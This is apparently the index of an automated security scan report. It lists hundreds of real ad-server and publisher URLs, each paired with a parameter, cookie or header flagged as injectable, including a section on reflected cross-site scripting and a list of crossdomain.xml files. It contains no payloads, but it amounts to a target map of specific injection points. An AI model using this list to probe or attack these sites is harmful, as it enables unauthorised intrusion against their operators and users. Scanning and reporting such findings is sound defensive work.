1.1. http://ad.doubleclick.net/adj/DY146/ron_lifestyle [sz parameter]
1.2. http://ad.doubleclick.net/adj/hdm.quicksimple/other/ [id cookie]
1.3. http://api.uproxx.com/ulink/feed [c_cats parameter]
1.4. http://hfm.checkm8.com/adam/detect [&LOC parameter]
1.5. http://hfm.checkm8.com/adam/detect [HEIGHT parameter]
1.6. http://hfm.checkm8.com/adam/detect [WIDTH parameter]
1.7. http://hfm.checkm8.com/adam/detect [dt cookie]
1.8. http://hfm.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]
1.9. http://hfm.checkm8.com/adam/detect [req parameter]
1.10. http://hfm.checkm8.com/adam/detected [DATE parameter]
1.11. http://hfm.checkm8.com/adam/detected [FL parameter]
1.12. http://hfm.checkm8.com/adam/detected [RES parameter]
1.13. http://hfm.checkm8.com/adam/detected [Referer HTTP header]
1.14. http://hfm.checkm8.com/adam/detected [WIDTH parameter]
1.15. http://hfm.checkm8.com/adam/detected [cm8dccp cookie]
1.16. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 1]
1.17. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 4]
1.21. http://syn.verticalacuity.com/varw/getPromo [Referer HTTP header]
1.22. http://www.answerology.com/ [name of an arbitrarily supplied request parameter]
1.23. http://www.answerology.com/cobrands/cosmogirl/CosmogirlLayout.js [REST URL parameter 1]
1.24. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 1]
1.25. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 3]
1.27. http://www.answerology.com/cobrands/marieclaire/MarieClaireLayout.js [REST URL parameter 2]
1.29. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 2]
1.30. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js [REST URL parameter 3]
1.31. http://www.answerology.com/cobrands/seventeen/SeventeenLayout.js [REST URL parameter 1]
1.32. http://www.answerology.com/cssjs/CharacterCounter.js [REST URL parameter 1]
1.33. http://www.answerology.com/cssjs/CoachesLayout.js [REST URL parameter 2]
1.34. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 1]
1.35. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 2]
1.36. http://www.answerology.com/index.aspx [REST URL parameter 1]
1.37. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg [REST URL parameter 2]
1.38. http://www.networkadvertising.org/managing/opt_out.asp [__utmz cookie]
1.40. http://y.timesunion.com/b/ss/hearstalbanytu/1/H.21/s97295546184759 [REST URL parameter 1]
2.1. http://ce.lijit.com/merge [REST URL parameter 1]
2.2. http://pixel.quantserve.com/optout_set [nocache parameter]
2.3. http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter]
3.1. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php [ES cookie]
3.2. http://login.dotomi.com/ucm/UCMController [redir_url parameter]
3.3. http://optout.crwdcntrl.net/optout [ct parameter]
3.4. http://optout.crwdcntrl.net/optout [d parameter]
3.5. http://optout.crwdcntrl.net/optout [name of an arbitrarily supplied request parameter]
4. Cross-site scripting (reflected)
4.1. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 2]
4.2. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 3]
4.4. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [sz parameter]
4.5. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2]
4.6. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3]
4.8. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [sz parameter]
4.9. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]
4.10. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]
4.12. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [sz parameter]
4.13. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]
4.14. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]
4.16. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [sz parameter]
4.17. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 1]
4.18. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 2]
4.19. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 3]
4.20. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [sz parameter]
4.24. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [sz parameter]
4.25. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 1]
4.26. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]
4.27. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]
4.28. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [sz parameter]
4.29. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 1]
4.30. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]
4.31. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]
4.32. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [sz parameter]
4.33. http://ad.agkn.com/iframe!t=1089! [clk1 parameter]
4.34. http://ad.agkn.com/iframe!t=1089! [clk1 parameter]
4.35. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]
4.36. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]
4.37. http://adnxs.revsci.net/imp [Z parameter]
4.38. http://adnxs.revsci.net/imp [s parameter]
4.39. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]
4.40. http://adsfac.us/ag.asp [cc parameter]
4.41. http://adsfac.us/ag.asp [clk parameter]
4.42. http://adsfac.us/ag.asp [clk parameter]
4.43. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]
4.44. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]
4.45. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]
4.46. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]
4.47. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]
4.48. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]
4.49. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]
4.50. http://advertising.aol.com/finish/3/4/1/ [REST URL parameter 1]
4.51. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]
4.52. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]
4.53. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]
4.54. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]
4.55. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]
4.56. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]
4.57. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]
4.58. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]
4.59. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]
4.60. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]
4.61. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]
4.62. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]
4.63. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]
4.64. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]
4.65. http://advertising.aol.com/nai/nai.php [action_id parameter]
4.66. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]
4.67. http://advertising.aol.com/token/0/2/1812733584/ [REST URL parameter 1]
4.68. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]
4.69. http://advertising.aol.com/token/0/3/295357155/ [REST URL parameter 1]
4.70. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]
4.71. http://advertising.aol.com/token/1/1/819977518/ [REST URL parameter 1]
4.72. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]
4.73. http://advertising.aol.com/token/1/3/1696897902/ [REST URL parameter 1]
4.74. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]
4.75. http://advertising.aol.com/token/2/2/1032347115/ [REST URL parameter 1]
4.76. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]
4.77. http://advertising.aol.com/token/2/3/1397978719/ [REST URL parameter 1]
4.78. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]
4.79. http://advertising.aol.com/token/3/1/8239370/ [REST URL parameter 1]
4.80. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]
4.81. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]
4.82. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]
4.83. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]
4.84. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]
4.85. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]
4.86. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]
4.87. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]
4.88. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]
4.89. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]
4.90. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]
4.91. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]
4.92. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]
4.93. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]
4.94. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]
4.95. http://advertising.aol.com/token/7/1/52531776/ [REST URL parameter 1]
4.96. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]
4.97. http://advertising.aol.com/token/7/3/1777313403/ [REST URL parameter 1]
4.98. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]
4.99. http://advertising.aol.com/token/8/1/585997419/ [REST URL parameter 1]
4.100. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]
4.101. http://advertising.aol.com/token/8/3/144927758/ [REST URL parameter 1]
4.102. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter]
4.103. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]
4.104. http://amch.questionmarket.com/adscgen/d_layer.php [site parameter]
4.105. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]
4.107. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]
4.108. http://api.uproxx.com/ulink/feed [pid parameter]
4.109. http://api.zap2it.com/tvlistings/zcConnector.jsp [aid parameter]
4.110. http://api.zap2it.com/tvlistings/zcConnector.jsp [ap parameter]
4.112. http://api.zap2it.com/tvlistings/zcConnector.jsp [stnlt parameter]
4.113. http://api.zap2it.com/tvlistings/zcConnector.jsp [v parameter]
4.114. http://api.zap2it.com/tvlistings/zcConnector.jsp [zip parameter]
4.115. http://b.scorecardresearch.com/beacon.js [c1 parameter]
4.116. http://b.scorecardresearch.com/beacon.js [c10 parameter]
4.117. http://b.scorecardresearch.com/beacon.js [c15 parameter]
4.118. http://b.scorecardresearch.com/beacon.js [c2 parameter]
4.119. http://b.scorecardresearch.com/beacon.js [c3 parameter]
4.120. http://b.scorecardresearch.com/beacon.js [c4 parameter]
4.121. http://b.scorecardresearch.com/beacon.js [c5 parameter]
4.122. http://b.scorecardresearch.com/beacon.js [c6 parameter]
4.123. http://c.aol.com/read/_topic_stats [callback parameter]
4.124. http://choices.truste.com/ca [c parameter]
4.125. http://choices.truste.com/ca [cid parameter]
4.126. http://choices.truste.com/ca [plc parameter]
4.127. http://cm.npc-hearst.overture.com/js_1_0/ [css_url parameter]
4.128. http://ellegirl.elle.com/ [name of an arbitrarily supplied request parameter]
4.158. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 1]
4.159. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 2]
4.160. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 3]
4.161. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 4]
4.162. http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 5]
4.169. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 1]
4.170. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 2]
4.171. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 3]
4.172. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 4]
4.173. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 5]
4.174. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 6]
4.181. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 1]
4.182. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 2]
4.183. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 3]
4.184. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 4]
4.185. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 5]
4.186. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 1]
4.187. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 2]
4.188. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 3]
4.189. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 4]
4.190. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]
4.191. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]
4.192. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]
4.193. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]
4.194. http://event.adxpose.com/event.flow [uid parameter]
4.195. http://events.seattlepi.com/partner_json/search [image_size parameter]
4.196. http://events.seattlepi.com/partner_json/search [jsonsp parameter]
4.197. http://events.seattlepi.com/partner_json/search [st parameter]
4.198. http://events.stamfordadvocate.com/partner_json/search [image_size parameter]
4.199. http://events.stamfordadvocate.com/partner_json/search [jsonsp parameter]
4.200. http://events.stamfordadvocate.com/partner_json/search [st parameter]
4.201. http://js.revsci.net/gateway/gw.js [csid parameter]
4.202. http://mpd.mxptint.net/1/S74.API/G1/T124/js [mid parameter]
4.203. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]
4.204. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]
4.205. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]
4.206. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]
4.207. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]
4.208. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]
4.209. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]
4.210. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]
4.211. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]
4.212. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]
4.213. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]
4.214. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]
4.215. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]
4.216. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]
4.217. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]
4.218. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]
4.219. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]
4.220. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]
4.221. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]
4.222. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]
4.223. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]
4.224. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]
4.225. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]
4.226. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]
4.227. http://nai.advertising.com/nai/daa.php [REST URL parameter 1]
4.228. http://nai.advertising.com/nai/daa.php [REST URL parameter 1]
4.229. http://nai.advertising.com/nai/daa.php [REST URL parameter 2]
4.230. http://nai.advertising.com/nai/daa.php [REST URL parameter 2]
4.231. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 1]
4.232. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 1]
4.233. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 2]
4.234. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 2]
4.235. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 3]
4.236. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 3]
4.237. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 1]
4.238. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 1]
4.239. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 2]
4.240. http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 2]
4.241. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 1]
4.242. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 1]
4.243. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 2]
4.244. http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 2]
4.245. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 1]
4.246. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 1]
4.247. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 2]
4.248. http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 2]
4.249. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 1]
4.250. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 1]
4.251. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 2]
4.252. http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 2]
4.253. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 1]
4.254. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 1]
4.255. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 2]
4.256. http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 2]
4.257. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]
4.258. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]
4.259. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]
4.260. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]
4.267. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 1]
4.268. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 1]
4.269. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]
4.270. http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]
4.271. http://nai.glb.adtechus.com/sites/all/modules/pollfield/pollfield.css [REST URL parameter 1]
4.272. http://nai.glb.adtechus.com/sites/all/modules/pollfield/pollfield.css [REST URL parameter 1]
4.273. http://nai.glb.adtechus.com/sites/all/modules/views/css/views.css [REST URL parameter 1]
4.274. http://nai.glb.adtechus.com/sites/all/modules/views/css/views.css [REST URL parameter 1]
4.277. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 1]
4.278. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 1]
4.279. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 2]
4.280. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 2]
4.281. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 3]
4.282. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 3]
4.283. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/html-elements.css [REST URL parameter 1]
4.284. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/html-elements.css [REST URL parameter 1]
4.285. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/tabs.css [REST URL parameter 1]
4.286. http://nai.glb.adtechus.com/sites/all/themes/zen/zen/tabs.css [REST URL parameter 1]
4.287. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]
4.288. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]
4.289. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]
4.290. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]
4.291. http://pixel.adsafeprotected.com/jspix [anId parameter]
4.292. http://pixel.adsafeprotected.com/jspix [campId parameter]
4.293. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
4.294. http://pixel.adsafeprotected.com/jspix [pubId parameter]
4.295. http://r.skimresources.com/api/ [callback parameter]
4.298. http://servedby.flashtalking.com/imp/3/17799 [cachebuster parameter]
4.299. http://servedby.flashtalking.com/imp/3/17799 [ftadz parameter]
4.300. http://servedby.flashtalking.com/imp/3/17799 [ftscw parameter]
4.301. http://servedby.flashtalking.com/imp/3/17799 [ftx parameter]
4.302. http://servedby.flashtalking.com/imp/3/17799 [fty parameter]
4.304. http://studio-5.financialcontent.com/hearst [Account parameter]
4.305. http://studio-5.financialcontent.com/hearst [Module parameter]
4.306. http://studio-5.financialcontent.com/hearst [REST URL parameter 1]
4.308. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
4.309. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
4.310. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
4.311. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
4.312. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
4.313. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
4.314. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
4.315. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
4.316. http://www.addthis.com/api/nai/optout [REST URL parameter 1]
4.317. http://www.addthis.com/api/nai/optout [REST URL parameter 1]
4.318. http://www.addthis.com/api/nai/optout [REST URL parameter 2]
4.319. http://www.addthis.com/api/nai/optout [REST URL parameter 2]
4.320. http://www.addthis.com/api/nai/optout [REST URL parameter 3]
4.321. http://www.addthis.com/api/nai/optout [REST URL parameter 3]
4.322. http://www.addthis.com/api/nai/status [REST URL parameter 1]
4.323. http://www.addthis.com/api/nai/status [REST URL parameter 1]
4.324. http://www.addthis.com/api/nai/status [REST URL parameter 2]
4.325. http://www.addthis.com/api/nai/status [REST URL parameter 2]
4.326. http://www.addthis.com/api/nai/status [REST URL parameter 3]
4.327. http://www.addthis.com/api/nai/status [REST URL parameter 3]
4.328. http://www.answerology.com/index.aspx [topic parameter]
4.329. http://www.answerology.com/index.aspx [topic parameter]
4.330. http://www.chron.com/apps/adWiz/adWiz.mpl [url parameter]
4.334. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]
4.335. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]
4.336. http://www.gather.com/a [REST URL parameter 1]
4.337. http://www.gather.com/a [REST URL parameter 1]
4.338. http://www.gather.com/favicon.ico [REST URL parameter 1]
4.339. http://www.gather.com/favicon.ico [REST URL parameter 1]
4.340. http://www.gather.com/global_andre.css [REST URL parameter 1]
4.341. http://www.gather.com/global_andre.css [REST URL parameter 1]
4.342. http://www.gather.com/peopleAreTalking.action [REST URL parameter 1]
4.343. http://www.gather.com/peopleAreTalking.action [REST URL parameter 1]
4.344. http://www.kampyle.com/feedback_form/ff-feedback-form.php [amp;form_id parameter]
4.345. http://www.kampyle.com/feedback_form/ff-feedback-form.php [amp;lang parameter]
4.347. http://www.kampyle.com/feedback_form/ff-feedback-form.php [stats parameter]
4.348. http://www.kampyle.com/feedback_form/ff-feedback-form.php [time_on_site parameter]
4.349. http://www.kampyle.com/feedback_form/ff-feedback-form.php [time_on_site parameter]
4.350. http://www.kampyle.com/feedback_form/ff-feedback-form.php [url parameter]
4.351. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utma parameter]
4.352. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utmv parameter]
4.353. http://www.kampyle.com/feedback_form/ff-feedback-form.php [utmz parameter]
4.354. http://www.local.com/dart/ [css parameter]
4.355. http://www.local.com/dart/ [kw parameter]
4.356. http://www.local.com/dart/ [kw parameter]
4.357. http://www.local.com/dart/ [l parameter]
4.358. http://www.local.com/dart/ [l parameter]
4.359. http://www.local.com/dart/ [ord parameter]
4.360. http://www.local.com/dart/ [ord parameter]
4.361. http://www.local.com/dart/ [p parameter]
4.362. http://www.local.com/dart/ [p parameter]
4.363. http://www.local.com/dart/ [sz parameter]
4.364. http://www.local.com/dart/ [sz parameter]
4.365. http://www.local.com/dart/ [zip parameter]
4.366. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]
4.367. http://www.stamfordadvocatedailydeals.com/widgets/widget [REST URL parameter 2]
4.368. http://adnxs.revsci.net/imp [Referer HTTP header]
4.369. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
4.370. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]
4.371. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]
4.372. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]
4.373. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]
4.374. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]
4.375. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]
4.376. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]
4.377. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]
4.378. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]
4.379. http://contextweb.pixel.invitemedia.com/context_sync [uid cookie]
4.380. http://r.skimresources.com/api/ [skimGUID cookie]
5.1. http://208.111.153.35/crossdomain.xml
5.2. http://33across.com/crossdomain.xml
5.3. http://a.collective-media.net/crossdomain.xml
5.4. http://a.netmng.com/crossdomain.xml
5.5. http://a.rad.msn.com/crossdomain.xml
5.6. http://a.rfihub.com/crossdomain.xml
5.7. http://a.tribalfusion.com/crossdomain.xml
5.8. http://ad.agkn.com/crossdomain.xml
5.9. http://ad.amgdgt.com/crossdomain.xml
5.10. http://ad.auditude.com/crossdomain.xml
5.11. http://ad.doubleclick.net/crossdomain.xml
5.12. http://ad.turn.com/crossdomain.xml
5.13. http://admin.brightcove.com/crossdomain.xml
5.14. http://admonkey.dapper.net/crossdomain.xml
5.15. http://ads.amgdgt.com/crossdomain.xml
5.16. http://ads.undertone.com/crossdomain.xml
5.17. http://ads.yldmgrimg.net/crossdomain.xml
5.18. http://adserver.teracent.net/crossdomain.xml
5.19. http://adsfac.us/crossdomain.xml
5.20. http://adunit.cdn.auditude.com/crossdomain.xml
5.21. http://afe.specificclick.net/crossdomain.xml
5.22. http://ajax.googleapis.com/crossdomain.xml
5.23. http://amch.questionmarket.com/crossdomain.xml
5.24. http://analytics.newsinc.com/crossdomain.xml
5.25. http://api.zap2it.com/crossdomain.xml
5.26. http://as1.suitesmart.com/crossdomain.xml
5.27. http://assets.newsinc.com/crossdomain.xml
5.28. http://b.rad.msn.com/crossdomain.xml
5.29. http://b.scorecardresearch.com/crossdomain.xml
5.30. http://bh.contextweb.com/crossdomain.xml
5.31. http://bs.serving-sys.com/crossdomain.xml
5.32. http://c.brightcove.com/crossdomain.xml
5.33. http://c.delish.com/crossdomain.xml
5.34. http://c.msn.com/crossdomain.xml
5.35. http://cache.specificmedia.com/crossdomain.xml
5.36. http://cdn.eyewonder.com/crossdomain.xml
5.37. http://cdn.turn.com/crossdomain.xml
5.38. http://ce.lijit.com/crossdomain.xml
5.39. http://cn1.kaboodle.com/crossdomain.xml
5.40. http://cn2.kaboodle.com/crossdomain.xml
5.41. http://cn3.kaboodle.com/crossdomain.xml
5.42. http://content.aggregateknowledge.com/crossdomain.xml
5.43. http://d.agkn.com/crossdomain.xml
5.44. http://dc.kaboodle.com/crossdomain.xml
5.45. http://dis.criteo.com/crossdomain.xml
5.46. http://ds.serving-sys.com/crossdomain.xml
5.47. http://edge.aperture.displaymarketplace.com/crossdomain.xml
5.48. http://edge1.catalog.video.msn.com/crossdomain.xml
5.49. http://edge3.catalog.video.msn.com/crossdomain.xml
5.50. http://event.adxpose.com/crossdomain.xml
